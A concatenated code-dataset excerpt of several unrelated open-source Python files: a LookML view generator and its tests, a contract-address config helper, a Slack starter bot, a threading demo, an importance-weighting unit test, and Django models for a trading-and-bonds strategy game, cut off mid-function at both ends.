</script>
""" )
if __name__ == '__main__':
main ()
``` |
{
"source": "jimmyshah/lookml-gen2",
"score": 3
} |
#### File: lookml-gen2/lookmlgen/view.py
```python
import json
from collections import OrderedDict
try:
from textwrap import indent
except ImportError:
from .util import indent
from .base_generator import BaseGenerator
from .field import FieldType
class View(BaseGenerator):
"""Generates a LookML View
Initialize a View object with your parameters,
add Fields such as :class:`~lookmlgen.field.Dimension`,
:class:`~lookmlgen.field.Measure`,
:class:`~lookmlgen.field.DimensionGroup`, and
:class:`~lookmlgen.field.Filter`, and then
generate LookML for the view using :py:meth:`~View.generate_lookml`
:param name: Name of the view
:param label: Label to use for the view (may contain spaces)
:param sql_table_name: Name of the SQL table to use in the view
:param file: File handle of a file open for writing or a
StringIO object
:type name: string
:type label: string
:type sql_table_name: list of strings
:type file: File handle or StringIO object
"""
def __init__(self, name, label=None, sql_table_name=None, file=None):
super(View, self).__init__(file=file)
self.name = name
self.label = label
self.sql_table_name = sql_table_name
self.fields = OrderedDict()
self.derived_table = None
def generate_lookml(self, file=None, format_options=None):
""" Writes LookML for the view to a file or StringIO buffer.
:param file: File handle of a file open for writing or a
StringIO object
:param format_options: Formatting options to use during generation
:type file: File handle or StringIO object
:type format_options:
:class:`~lookmlgen.base_generator.GeneratorFormatOptions`
"""
if not file and not self.file:
raise ValueError('Must provide a file in either the constructor '
'or as a parameter to generate_lookml()')
f = file if file else self.file
fo = format_options if format_options else self.format_options
if fo.warning_header_comment:
f.write(fo.warning_header_comment)
f.write('view: {self.name} {{\n'.format(self=self))
if self.sql_table_name:
f.write('{indent}sql_table_name: {self.sql_table_name} ;;\n'.
format(indent=' ' * fo.indent_spaces, self=self))
if self.label:
f.write('{indent}label: "{self.label}"\n'.
format(indent=' ' * fo.indent_spaces, self=self))
if fo.newline_between_items:
f.write('\n')
if self.derived_table:
self.derived_table.generate_lookml(file=f, format_options=fo)
if fo.newline_between_items:
f.write('\n')
if fo.view_fields_alphabetical:
self.__ordered_fields = sorted(self.fields.items())
else:
self.__ordered_fields = self.fields.items()
self.__generated_fields = []
self._gen_fields(f, fo, [FieldType.FILTER])
self._gen_fields(f, fo, [FieldType.DIMENSION, FieldType.DIMENSION_GROUP])
self._gen_fields(f, fo, [FieldType.MEASURE])
f.write('}\n')
return
def add_field(self, field):
"""Adds a :class:`~lookmlgen.field.Field` object to a :class:`View`"""
self.fields[field.name] = field
return
def set_derived_table(self, derived_table):
"""Adds a :class:`~lookmlgen.view.DerivedTable` object to a
:class:`View`
"""
self.derived_table = derived_table
def _gen_fields(self, f, fo, field_types):
for k, d in self.__ordered_fields:
if d.field_type not in field_types:
continue
if len(self.__generated_fields) != 0 and fo.newline_between_items:
f.write('\n')
d.generate_lookml(file=f, format_options=fo)
self.__generated_fields.append(d)
class DerivedTable(BaseGenerator):
"""Generates the LookML View parameters to support derived
tables, including persistent derived tables (PDTs).
:param sql: SQL statement to execute
:param sql_trigger_value: SQL to determine when to trigger build
:param indexes: List of coluxn names to use as indexes
:param file: File handle of a file open for writing or a StringIO object
:type sql: string
:type sql_trigger_value: string
:type indexes: list of strings
:type file: File handle or StringIO object
"""
def __init__(self, sql, sql_trigger_value=None, indexes=None, file=None):
super(DerivedTable, self).__init__(file=file)
self.sql = sql
self.sql_trigger_value = sql_trigger_value
self.indexes = indexes
def generate_lookml(self, file=None, format_options=None):
""" Writes LookML for a derived table to a file or StringIO buffer.
:param file: File handle of a file open for writing or a
StringIO object
:param format_options: Formatting options to use during generation
:type file: File handle or StringIO object
:type format_options:
:class:`~lookmlgen.base_generator.GeneratorFormatOptions`
"""
if not file and not self.file:
raise ValueError('Must provide a file in either the constructor '
'or as a parameter to generate_lookml()')
f = file if file else self.file
fo = format_options if format_options else self.format_options
f.write('{indent}derived_table: {{\n'.
format(indent=' ' * fo.indent_spaces))
if self.sql:
final_sql = ' ' + self.sql if '\n' not in self.sql \
else '\n' + indent(self.sql, ' ' * 3 * fo.indent_spaces)
f.write('{indent}sql:{sql} ;;\n'.
format(indent=' ' * 2 * fo.indent_spaces, sql=final_sql))
if self.sql_trigger_value:
f.write('{indent}sql_trigger_value: '
'{self.sql_trigger_value} ;;\n'.
format(indent=' ' * 2 * fo.indent_spaces, self=self))
if self.indexes:
f.write('{indent}indexes: {indexes}\n'.
format(indent=' ' * 2 * fo.indent_spaces,
indexes=json.dumps(self.indexes)))
f.write('{indent}}}\n'.format(indent=' ' * fo.indent_spaces))
```
#### File: lookml-gen2/tests/test_view.py
```python
import os
import six
from lookmlgen import view
from lookmlgen import field
from lookmlgen import base_generator
test_format_options = base_generator.\
GeneratorFormatOptions(warning_header_comment=None)
def test_basic_view():
testname = 'basic_view'
v = view.View(testname)
v.add_field(field.Dimension('dimension1', sql='${TABLE}.dim1'))
f = six.StringIO()
v.generate_lookml(f, format_options=test_format_options)
lookml = f.getvalue()
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
def test_pdt_view():
testname = 'pdt_view'
pdt = view.DerivedTable(sql="SELECT id, count(*) c FROM table GROUP BY id",
sql_trigger_value='DATE()',
indexes=['id'])
v = view.View(testname)
v.derived_table = pdt
v.add_field(field.Dimension('id', type='number',
primary_key=True))
v.add_field(field.Dimension('c', type='number'))
v.add_field(field.Measure('sum_c', sql='${TABLE}.c', type='sum'))
f = six.StringIO()
v.generate_lookml(f, format_options=test_format_options)
lookml = f.getvalue()
six.print_(lookml)
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
def test_dimension_group():
testname = 'dimension_group_test'
v = view.View(testname)
v.add_field(field.DimensionGroup('dimension1', sql='${TABLE}.dim1'))
f = six.StringIO()
v.generate_lookml(f, format_options=test_format_options)
lookml = f.getvalue()
six.print_(lookml)
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
def test_dimension_group_no_timeframes():
testname = 'dimension_group_no_timeframes_test'
v = view.View(testname)
v.add_field(field.DimensionGroup('dimension1', sql='${TABLE}.dim1'))
f = six.StringIO()
fo_omit_timeframes = base_generator.\
GeneratorFormatOptions(warning_header_comment=None, omit_time_frames_if_not_set=True)
v.generate_lookml(f, format_options=fo_omit_timeframes)
lookml = f.getvalue()
six.print_(lookml)
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
def test_newlines():
testname = 'newlines_test'
v = view.View(testname)
for l in ['a', 'b', 'c', 'd']:
v.add_field(field.Dimension(l, type='number'))
v.add_field(field.Measure('sum_' + l, type='sum', sql='${{{0}}}'.format(l)))
f = six.StringIO()
v.generate_lookml(f, format_options=test_format_options)
lookml = f.getvalue()
six.print_(lookml)
with open(os.path.join(os.path.dirname(__file__),
'expected_output/%s.lkml' % testname),
'rt') as expected:
assert lookml == expected.read()
``` |
{
"source": "JimmyShi22/python-sdk",
"score": 2
} |
#### File: python-sdk/client/contractnote.py
```python
from client_config import client_config
from configobj import ConfigObj
class ContractNote:
@staticmethod
def get_last(name):
config = ConfigObj(client_config.contract_info_file, encoding='UTF8')
if name in config["address"]:
address = config["address"][name]
else:
address = None
return address
@staticmethod
def save_address(contractname, newaddress, blocknum=None, memo=None):
from configobj import ConfigObj
import time
#write to file
config = ConfigObj(client_config.contract_info_file,
encoding='UTF8')
if 'address' not in config:
#print("address not in config",config)
config['address']={}
config['address'][contractname] = newaddress
#print (config)
if blocknum!=None:
if "history" not in config:
config["history"]={}
timestr = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime());
detail="{}:{},block:{}".format(contractname,timestr,blocknum)
if memo !=None: #
detail="{},{}".format(detail,memo)
config["history"][newaddress] = detail
config.write()
``` |
{
"source": "JimmyShi22/WorkSpace",
"score": 3
} |
#### File: codes/chatbot/startbot.py
```python
import os
import time
from slackclient import SlackClient
# starterbot的ID作为一个环境变量
BOT_ID = os.environ.get("BOT_ID")
# 常量
AT_BOT = "<@" + BOT_ID + ">"
EXAMPLE_COMMAND = "do"
# 实例化 Slack 和 Twilio 客户端
slack_client = SlackClient(os.environ.get('SLACK_BOT_TOKEN'))
def handle_command(command, channel):
"""
Receives commands directed at the bot and determines if they
are valid commands. If so, then acts on the commands. If not,
returns back what it needs for clarification.
"""
response = "Not sure what you mean. Use the *" + EXAMPLE_COMMAND + \
"* command with numbers, delimited by spaces."
if command.startswith(EXAMPLE_COMMAND):
response = "Sure...write some more code then I can do that!"
slack_client.api_call("chat.postMessage", channel=channel,
text=response, as_user=True)
def parse_slack_output(slack_rtm_output):
"""
The Slack Real Time Messaging API is an events firehose.
this parsing function returns None unless a message is
directed at the Bot, based on its ID.
"""
output_list = slack_rtm_output
if output_list and len(output_list) > 0:
for output in output_list:
if output and 'text' in output and AT_BOT in output['text']:
# 返回 @ 之后的文本,删除空格
return output['text'].split(AT_BOT)[1].strip().lower(), \
output['channel']
return None, None
if __name__ == "__main__":
READ_WEBSOCKET_DELAY = 1 # 1 second delay between reading from firehose
if slack_client.rtm_connect():
print("StarterBot connected and running!")
while True:
command, channel = parse_slack_output(slack_client.rtm_read())
if command and channel:
handle_command(command, channel)
time.sleep(READ_WEBSOCKET_DELAY)
else:
print("Connection failed. Invalid Slack token or bot ID?")
``` |
{
"source": "jimmysitu/pyMultiThreadTest",
"score": 3
} |
#### File: jimmysitu/pyMultiThreadTest/multiThreadTest.py
```python
import threading
import queue
import time
class testThread(threading.Thread):
def __init__(self, thId):
threading.Thread.__init__(self)
self.thId = thId
def run(self):
print("Thread %d started" % self.thId)
while not exitFlag:
qLock.acquire()
if not jobQueue.empty():
job = jobQueue.get()
qLock.release()
print("Thread %d get job: %d" % (self.thId, job))
else:
print("Thread %d idle" % (self.thId))
qLock.release()
time.sleep(1)
print("Thread %d end" % self.thId)
if __name__ == "__main__":
threads = []
exitFlag = 0
qLock = threading.Lock()
jobQueue = queue.Queue()
for i in range(6):
thd = testThread(i)
thd.start()
threads.append(thd)
qLock.acquire()
for j in range(0, 1000):
jobQueue.put(j+10000)
qLock.release()
# It is not reliable for Qeueu.empty() to sync process/thread
# Sleep for a while for safty here
time.sleep(1)
while not jobQueue.empty():
pass
exitFlag = 1
for thd in threads:
thd.join()
``` |
{
"source": "jimmyskull/covariate-shift-adaptation",
"score": 3
} |
#### File: pantaray/test/test_importance.py
```python
import unittest
import numpy as np
from numpy.random import shuffle
from sklearn.datasets import load_digits
from sklearn.linear_model import LogisticRegression
from sklearn.exceptions import NotFittedError
from pantaray.importance_estimation import PCIF
class ImportanceTest(unittest.TestCase):
def setUp(self):
data, target = load_digits(return_X_y=True)
index_0to4 = np.where(target <= 4)[0]
index_5to9 = np.where(target > 4)[0]
shuffle(index_0to4)
shuffle(index_5to9)
# 75% of 0-4 and 25% of 5-9 in the train set.
# 25% of 0-4 and 75% of 5-9 in the test set.
first, second = int(len(index_0to4) * 0.75), int(len(index_5to9) * 0.25)
train = np.concatenate((index_0to4[:first], index_5to9[:second]))
test = np.concatenate((index_0to4[first:], index_5to9[second:]))
# Put results as instance attributes.
self.X_train, self.y_train = data[train], data[train]
self.X_test, self.y_test = data[test], data[test]
def test_something(self):
X_train, X_test = self.X_train, self.X_test
pcif = PCIF()
pcif.fit(X_train, X_test, LogisticRegression())
w_train = pcif.predict(X_train)
w_test = pcif.predict(X_test)
print(w_train.mean())
print(w_test.mean())
def test_error_predict_without_fit(self):
X_train, X_test = self.X_train, self.X_test
pcif = PCIF()
with self.assertRaises(NotFittedError):
w_train = pcif.predict(X_train)
``` |
{
"source": "jimmyskull/ironandblood",
"score": 3
} |
#### File: ironandblood/game/config.py
```python
import datetime
class Config:
# Initial date in game-time
start_epoch = datetime.datetime(1800, 1, 31, 0, 0, 0)
# Initial date in real-time
start_date = datetime.datetime(2016, 3, 31, 0, 0, 0)
@staticmethod
def current_game_date():
return Config.to_game_date(datetime.datetime.now())
@staticmethod
def to_game_date(date):
"""
Returns the game-time date.
1 turn = 1 game-time year = 1 real-time day.
"""
seconds = (date - Config.start_date).total_seconds()
norm = 0.004224537037037037 # 1s / (60s * 60m) / 24h * 365d
return Config.start_epoch + datetime.timedelta(days = seconds * norm)
```
#### File: ironandblood/game/models.py
```python
from django.contrib.auth.models import User
from django.core.exceptions import ValidationError
from django.db import models, transaction
from django.db.models import Sum
from django.utils import timezone
from django.utils.translation import ugettext as _
class Resources(models.Model):
currency = models.IntegerField('Currency', default=0)
manufactured = models.IntegerField('Manufactured Goods', default=0)
agricultural = models.IntegerField('Agricultural Goods', default=0)
_list = ['currency', 'manufactured', 'agricultural']
_colors = {
'currency': '#c2a91b',
'manufactured': '#34495E',
'agricultural': '#007733'
}
_sparkline_colors = {
'currency': '#18ff00',
'manufactured': '#0096ff',
'agricultural': '#ffea00'
}
# ['#18ff00', '#0096ff', '#ffea00']
# ['#c2a91b', '#34495E', '#007733']
def __str__(self):
"""
Returns a list of nonzero resource quantities.
"""
nonzero = list()
for name in self._list:
quantity = getattr(self, name)
if quantity != 0:
nonzero.append('{}={}'.format(name, quantity))
return ', '.join(nonzero)
def _update(self, other, fn):
"""
Update all fields calling self.field = fn(self.field, other.field)
"""
for name in self._list:
setattr(self, name, fn(getattr(self, name), getattr(other, name)))
def as_list(self):
return [getattr(self, name) for name in self._list]
@staticmethod
def color(name):
return Resources._colors[name]
@staticmethod
def colors_as_str_list():
return list(map(str, Resources._sparkline_colors.values()))
def has_currency(self):
return self.currency > 0
def has_agricultural(self):
return self.agricultural > 0
def has_manufactured(self):
return self.manufactured > 0
def add(self, other):
"""
Changes `self` by adding values from `other`.
"""
self._update(other, lambda a, b: a + b)
def covers(self, other):
"""
True if `self` has at least the same amount of resources in `other`.
"""
return all([getattr(self, i) >= getattr(other, i) for i in self._list])
def subtract(self, other):
"""
Changes `self` by subtracting values from `other`.
"""
self._update(other, lambda a, b: a - b)
def is_empty(self):
"""Return if all values are zero"""
return all([getattr(self, i) == 0 for i in self._list])
def is_zero_or_positive(self):
"""Return if all values are zero or positive"""
return all([getattr(self, i) >= 0 for i in self._list])
class Player(models.Model):
"""
Player information
Roles
=====
* **Privateer** Player with no territories or charters
* **Chartered company** Player with charters
* **Head of State** Player that owns one or more territories
Credit Quality
==============
The player’s delinquency rate affects some macroeconomic factors:
* economic output
* unemployment
* inflation
* investments (by gaming dynamics, since credit quality is public).
Note: in real life, the credit quality is determined by the other way around,
and here we use the performance of a player to determine those features.
"""
user = models.OneToOneField(User, on_delete=models.CASCADE,
related_name='player')
resources = models.OneToOneField(Resources, on_delete=models.CASCADE)
delinquency = models.IntegerField(
'Delinquent bonds',
default=0,
help_text=("Number of delinquent bonds as creditor. The rate of "
"delinquency (delinquent bonds over total paid bonds) affects the "
"credit quality of the player."))
@classmethod
def create_player(cls, user):
res = Resources()
res.save()
return cls(user=user, resources=res)
def territories(self):
"""List of territories controlled by the player"""
return Territory.objects.filter(owner=self.user)
def charter(self):
"""List of active charters to the player"""
return Charter.objects.filter(member=self.user)
def is_privateer(self):
"""True if the player is currently a Privateer"""
return len(self.territories()) == 0 and len(self.charter()) == 0
def is_chartered_company(self):
"""True if the player is currently a Chartered Company"""
return len(self.territories()) == 0 and len(self.charter()) >= 1
def is_head_of_state(self):
"""True if the player is currently a Head of State"""
return len(self.territories()) >= 1
class Territory(models.Model):
"""Territory information"""
owner = models.ForeignKey(User, null=True, blank=True)
code = models.CharField(max_length=16, blank=False)
name = models.CharField(max_length=32, blank=False)
land_area = models.IntegerField('Land area', default=100)
def __str__(self):
return 'name={}, area={}'.format(self.name, self.land_area)
class Charter(models.Model):
territory = models.ForeignKey(Territory, blank=False)
member = models.ForeignKey(User, blank=False)
size = models.IntegerField('Land area percentage', default=10)
@staticmethod
def _validate_size(size):
if size <= 0 or size > 100:
raise ValidationError(
_("Grant size of %(grant_size)d%% is not within the range 1%%–100%%."),
params={
'grant_size': size
})
@staticmethod
def _check_leaser_controls_territory(territory, leaser):
if territory.owner != leaser:
raise ValidationError(
_("%(player)s does not currently control “%(territory)s”."),
params={
'player': leaser.username,
'territory': territory.name
})
@staticmethod
def _check_if_member_already_has_charter(territory, member):
if Charter.objects.filter(territory=territory, member=member):
raise ValidationError(
_("%(player)s already has a charter in “%(territory)s”."),
params={
'player': member.username,
'territory': territory.name
})
@staticmethod
def _check_territory_not_full(territory, member, size):
allotted = Charter.objects.filter(territory=territory)
allotted = allotted.aggregate(Sum('size'))['size__sum']
if allotted is None:
allotted = 0
free = 100 - allotted
if free < size:
raise ValidationError(
_("“%(territory)s” has %(free)d%% of its land area available. "
"Trying to grant %(grant_size)d%% of land."),
params={
'territory': territory.name,
'free': free,
'grant_size': size
})
@classmethod
def grant(cls, leaser, territory, member, size):
"""
Grants `size` percent of the `territory`’s land area to `member`.
* `leaser` must control `territory`
* The sum of all charters in the `territory` cannot pass 100%
* `member` cannot already have a charter in the territory.
"""
cls._validate_size(size=size)
cls._check_leaser_controls_territory(territory=territory, leaser=leaser)
cls._check_if_member_already_has_charter(territory=territory, member=member)
cls._check_territory_not_full(territory=territory, member=member, size=size)
return cls(territory=territory, member=member, size=size)
class Bond(models.Model):
"""Bond is a debt investment in which an `issuer` loans `resource` to a
`creditor`. The creditor agrees to pay the debt in up to `maturity_date`
turns, except if the bond is a Perpetual Bond (`maturity_date` == 0).
If not paid, `creditor` increases his delinquency."""
PENDING = 'W'
PAID = 'P'
FORGIVEN = 'F'
BOND_STATE = (
(PENDING, 'Pending'),
(PAID, 'Paid'),
(FORGIVEN, 'Forgiven'),
)
# Holder is the player that will receive the payment
holder = models.ForeignKey(User, related_name='+')
# Borrower is the player that can either pay to he holder or
# exchange the bond with a third player.
borrower = models.ForeignKey(User, related_name='+')
resources = models.ForeignKey(Resources, null=True, blank=True,
related_name='+')
territory = models.ForeignKey(Territory, null=True, blank=True,
related_name='+')
origin_exchange = models.ForeignKey('game.Exchange', null=True, blank=True,
related_name='+')
payment_exchange = models.ForeignKey('game.Exchange', null=True, blank=True,
related_name='+')
maturity = models.IntegerField(default=0)
state = models.CharField(max_length=1, choices=BOND_STATE, default=PENDING)
def __str__(self):
ret = ["pk={}, state={}, holder={}, borrower={}".format(self.pk,
self.get_state_display(), self.holder, self.borrower)]
if self.resources:
ret.append(", resources=<{}>".format(self.resources))
if self.territory:
ret.append(", territory=<{}>").format(self.territory)
return ''.join(ret)
def _check_user_is_holder(self, user):
if self.holder and user != self.holder:
raise ValidationError(_("“%(player)s” is not the holder of this bond."),
params={
'player': user.username
})
def _check_user_is_borrower(self, user):
if self.borrower and user != self.borrower:
raise ValidationError(
_("“%(player)s” is not the borrower of this bond."),
params={
'player': user.username
})
def _check_state_pending(self):
if self.state != self.PENDING:
raise ValidationError(_("This bond is not pending."))
def forgive(self, user):
self._check_user_is_holder(user=user)
self._check_state_pending()
self.state = self.FORGIVEN
self.save()
return True
def pay(self, user):
self._check_user_is_borrower(user=user)
self._check_state_pending()
exchange = Exchange(offeror=self.borrower,
offeror_resources=self.resources,
offeror_territory=self.territory,
offeree=self.holder)
exchange.offer(user=user)
exchange.accept(user=self.holder)
self.payment_exchange = exchange
self.state = self.PAID
self.save()
return True
def is_payable(self, borrower=None):
if borrower is None:
borrower = self.borrower
exchange = Exchange(offeror=borrower,
offeror_resources=self.resources,
offeror_territory=self.territory,
offeree=self.holder)
exchange.state = Exchange.WAITING
return exchange.is_acceptable()
def is_pending(self):
return self.state == self.PENDING
def is_paid(self):
return self.state == self.PAID
def is_forgiven(self):
return self.state == self.FORGIVEN
def includes_currency(self):
return self.includes_resources() and self.resources.has_currency()
def includes_agricultural(self):
return self.includes_resources() and self.resources.has_agricultural()
def includes_manufactured(self):
return self.includes_resources() and self.resources.has_manufactured()
def includes_resources(self):
return self.resources and not self.resources.is_empty()
def includes_territory(self):
return self.territory is not None
def get_creation_date(self):
return self.origin_exchange.answer_date
def get_payment_date(self):
return self.payment_exchange.answer_date
class Exchange(models.Model):
"""
Exchange Trading System
Exchange is the way to trade resources between two players.
Exchange mechanism
------------------
Exchange operations allow complex transactions with some level of guarantee
for the two players.
Barter
Exchange of goods, without using money.
Donation
Send goods, money, or territories to the other player. Or ask for donation.
Payment
Offer goods for money.
Bond (debts)
Exchange bonds directly between players (pass responsibility of payment
to the other player, keeping the original bond lender).
Complex operations
One can mix goods, money, territories and even a bond (debt) in a single
exchange operation.
Events associated with an exchange
----------------------------------
Offering
An offeror prepares an exchange, setting resources to be
sent and resources to be received from the offeree player.
While not accepted/rejected, the resources to be sent to offeree is held
to guarantee the exchange success in case of agreement.
**Note** Territories are not held while waiting for response. That is,
the player can offer the same territory to many users, and the first one
to accept will get the ownership.
Waiting response
The offeree player receives the exchange proposal.
Offeree accepts
Resources are finally exchanged and the negotiation ends.
Offeree rejects
Offeror resources are released and the exchange is canceled.
Offeror cancels
Offeror cancels the exchange proposal and his resources and released.
"""
UNKNOWN = 'U'
WAITING = 'W'
ACCEPTED = 'A'
REJECTED = 'R'
CANCELED = 'C'
NEGOTIATION_STATE = (
(UNKNOWN, 'Unknown'),
(WAITING, 'Waiting'),
(ACCEPTED, 'Accepted'),
(REJECTED, 'Rejected'),
(CANCELED, 'Canceled'),
)
offeror = models.ForeignKey(User, related_name='+')
offeror_resources = models.ForeignKey(Resources, null=True,
related_name='+')
offeror_territory = models.ForeignKey(Territory, null=True, blank=True,
related_name='+')
offeror_bond = models.ForeignKey(Bond, null=True, blank=True,
related_name='+')
offeror_as_bond = models.BooleanField(default=False)
offeror_as_bond_maturity = models.IntegerField(default=0)
offeree = models.ForeignKey(User, related_name='+')
offeree_resources = models.ForeignKey(Resources, null=True,
related_name='+')
offeree_territory = models.ForeignKey(Territory, null=True, blank=True,
related_name='+')
offeree_bond = models.ForeignKey(Bond, null=True, blank=True,
related_name='+')
offeree_as_bond = models.BooleanField(default=False)
offeree_as_bond_maturity = models.IntegerField(default=0)
state = models.CharField(max_length=1, choices=NEGOTIATION_STATE,
default=UNKNOWN)
offer_date = models.DateTimeField(null = True, blank = True)
answer_date = models.DateTimeField(null = True, blank = True)
def __str__(self):
ret = ["pk={}, state={}".format(self.pk, self.get_state_display())]
if self.offeror:
ret.append(", (offeror={}".format(self.offeror))
if self.offeror_resources:
ret.append(", resources=<{}>".format(self.offeror_resources))
if self.offeror_territory:
ret.append(", territory=<{}>".format(self.offeror_territory))
if self.offeror_bond:
ret.append(", bond=<{}>".format(self.offeror_bond))
if self.offeror_as_bond:
ret.append(", as_bond")
ret.append(")")
else:
ret.append(", no offeror")
if self.offeree:
ret.append(", (offeree={}".format(self.offeree))
if self.offeree_resources:
ret.append(", resources=<{}>".format(self.offeree_resources))
if self.offeree_territory:
ret.append(", territory=<{}>".format(self.offeree_territory))
if self.offeree_bond:
ret.append(", bond=<{}>".format(self.offeree_bond))
if self.offeree_as_bond:
ret.append(", as_bond")
ret.append(")")
else:
ret.append(", no offeree")
return ''.join(ret)
def save(self, *args, **kwargs):
if self.offeror_resources:
self.offeror_resources.save()
if self.offeree_resources:
self.offeree_resources.save()
super(Exchange, self).save(*args, **kwargs)
def _offeror_has_resources(self):
return not (self.offeror_resources is None or \
self.offeror_resources.is_empty())
def _offeree_has_resources(self):
return not (self.offeree_resources is None or \
self.offeree_resources.is_empty())
def _validate_bond(self):
# We must refuse Bond exchanges with their holders, because currently
# there is no way to perform a safe transaction.
# Example: offeror Bond payment would be ok, but if offeree Bond, then
# we would have to undo the first payment.
if (self.offeror_bond is not None and self.offeror_as_bond) or \
(self.offeree_bond is not None and self.offeree_as_bond):
raise ValidationError(_("Cannot build a Bond of Bond."))
if self.offeror_bond:
if self.offeror_bond.borrower != self.offeror:
raise ValidationError(
_("“%(player)s” is not the borrower of this Bond."),
params={
'player': self.offeror.username
})
if self.offeror_bond.holder == self.offeree:
raise ValidationError(
_("Cannot exchange a Bond with its holder. "
"To pay the bond, use the payment section."))
if self.offeror_bond.state != self.offeror_bond.PENDING:
raise ValidationError(_("This Bond is not pending."))
if self.offeree_bond:
if self.offeree_bond.borrower != self.offeree:
raise ValidationError(
_("“%(player)s” is not the holder of this Bond."),
params={
'player': self.offeree.username
})
if self.offeree_bond.holder == self.offeror:
raise ValidationError(
_("Cannot exchange a Bond with its holder."))
if self.offeree_bond.state != self.offeree_bond.PENDING:
raise ValidationError(_("This Bond is not pending."))
def _validate_territory_ownership(self):
"""Applicable before accept"""
if not self.offeror_as_bond and self.offeror_territory:
if self.offeror_territory.owner != self.offeror:
raise ValidationError(
_("Offeror “%(player)s” does not control “%(territory)s”."),
params={
'player': self.offeror.username,
'territory': self.offeror_territory.name
})
if not self.offeree_as_bond and self.offeree_territory:
if self.offeree_territory.owner != self.offeree:
raise ValidationError(
_("Offeree “%(player)s” does not control “%(territory)s”."),
params={
'player': self.offeree.username,
'territory': self.offeree_territory.name
})
def _validate_resource_sufficiency(self):
if not self.offeree_as_bond and self._offeree_has_resources():
if not self.offeree.player.resources.covers(self.offeree_resources):
raise ValidationError(
_("Offeree “%(player)s” lack resources to accept this exchange."),
params={
'player': self.offeree.username
})
if self.state == self.UNKNOWN:
if not self.offeror_as_bond and self._offeror_has_resources():
if not self.offeror.player.resources.covers(self.offeror_resources):
raise ValidationError(
_("Offeror “%(player)s” lack resources to offer this exchange."),
params={
'player': self.offeror.username
})
def _check_if_empty(self):
if not self._offeror_has_resources() and \
not self._offeree_has_resources() and \
self.offeror_territory is None and \
self.offeree_territory is None and \
self.offeror_bond is None and \
self.offeree_bond is None:
raise ValidationError(_("Empty exchange."))
def _validate_user_as_offeror(self, user):
if self.offeror and user != self.offeror:
raise ValidationError(
_("“%(player)s” is not the offeror of this exchange."),
params={
'player': user.username
})
def _validate_user_as_offeree(self, user):
if self.offeree and user != self.offeree:
raise ValidationError(
_("“%(player)s” is not the offeree of this exchange."),
params={
'player': user.username
})
def offer(self, user):
"""
Offeror `user` sends the exchange proposal.
Collect resources from `offeror` to prepare for transaction.
We do not reserve resources of `offeree` because he is still not aware
of this exchange.
"""
self._validate_user_as_offeror(user=user)
if self.state != self.UNKNOWN:
raise ValidationError(_("This exchange cannot be offered."))
if self.offeror == self.offeree:
raise ValidationError(_("Offeror and offeree cannot be the same."))
self._check_if_empty()
self._validate_bond()
#self._validate_territory_ownership()
self._validate_resource_sufficiency()
if not self.offeror_as_bond and self._offeror_has_resources():
self.offeror.player.resources.subtract(self.offeror_resources)
self.state = self.WAITING
self.offer_date = timezone.now()
self.save()
return True
def is_acceptable(self):
try:
if self.state != self.WAITING:
raise ValidationError(_("This exchange is not waiting for response."))
self._validate_bond()
self._validate_territory_ownership()
self._validate_resource_sufficiency()
except:
return False
return True
def could_offeror_pay_offeree_bond(self):
return self.offeree_bond.is_payable(borrower = self.offeror)
def could_offeree_pay_offeror_bond(self):
return self.offeror_bond.is_payable(borrower = self.offeree)
@transaction.atomic
def accept(self, user):
"""
Offeree `user` accepts the exchange. Resources are finally exchanged.
"""
self._validate_user_as_offeree(user=user)
if self.state != self.WAITING:
raise ValidationError(_("This exchange is not waiting for response."))
self._validate_bond()
self._validate_territory_ownership()
self._validate_resource_sufficiency()
# Execute transactions after checking everything
if self.offeror_as_bond:
bond = Bond(borrower=self.offeror, holder=self.offeree,
resources=self.offeror_resources,
territory=self.offeror_territory,
origin_exchange=self,
maturity=self.offeror_as_bond_maturity)
bond.save()
else:
if self._offeror_has_resources():
self.offeree.player.resources.add(self.offeror_resources)
if self.offeror_territory:
self.offeror_territory.owner = self.offeree
self.offeror_territory.save()
if self.offeror_bond:
self.offeror_bond.borrower = self.offeree
self.offeror_bond.save()
if self.offeree_as_bond:
bond = Bond(borrower=self.offeree, holder=self.offeror,
resources=self.offeree_resources,
territory=self.offeree_territory,
origin_exchange=self,
maturity=self.offeree_as_bond_maturity)
bond.save()
else:
if self._offeree_has_resources():
self.offeree.player.resources.subtract(self.offeree_resources)
self.offeror.player.resources.add(self.offeree_resources)
if self.offeree_territory:
self.offeree_territory.owner = self.offeror
self.offeree_territory.save()
if self.offeree_bond:
self.offeree_bond.borrower = self.offeror
self.offeree_bond.save()
self.offeree.player.resources.save()
self.offeror.player.resources.save()
self.state = self.ACCEPTED
self.answer_date = timezone.now()
self.save()
return True
def _undo_offer(self):
if self.state != self.WAITING:
raise ValidationError(_("This exchange is not waiting for response."))
if self._offeror_has_resources():
self.offeror.player.resources.add(self.offeror_resources)
def reject(self, user):
"""
Offeree `user` rejects the exchange.
"""
self._validate_user_as_offeree(user=user)
self._undo_offer()
self.state = self.REJECTED
self.answer_date = timezone.now()
self.save()
return True
def cancel(self, user):
"""
Offeror `user` cancels the exchange. Operation identical to rejection.
"""
self._validate_user_as_offeror(user=user)
self._undo_offer()
self.state = self.CANCELED
self.answer_date = timezone.now()
self.save()
return True
def is_waiting(self):
return self.state == self.WAITING
def is_accepted(self):
return self.state == self.ACCEPTED
def is_rejected(self):
return self.state == self.REJECTED
def is_canceled(self):
return self.state == self.CANCELED
def includes_currency(self):
return (self._offeror_has_resources() and self.offeror_resources.has_currency()) \
or (self._offeree_has_resources() and self.offeree_resources.has_currency())
def includes_agricultural(self):
return (self._offeror_has_resources() and self.offeror_resources.has_agricultural()) \
or (self._offeree_has_resources() and self.offeree_resources.has_agricultural())
def includes_manufactured(self):
return (self._offeror_has_resources() and self.offeror_resources.has_manufactured()) \
or (self._offeree_has_resources() and self.offeree_resources.has_manufactured())
def includes_resources(self):
return self._offeror_has_resources() or self._offeree_has_resources()
def includes_territories(self):
return self.offeror_territory or self.offeree_territory
def includes_bonds(self):
return self.offeror_bond or self.offeree_bond
def is_gift(self):
"""
True if only one player is offer not empty in this exchange
"""
offeror = (self._offeror_has_resources() or self.offeror_territory is not None or \
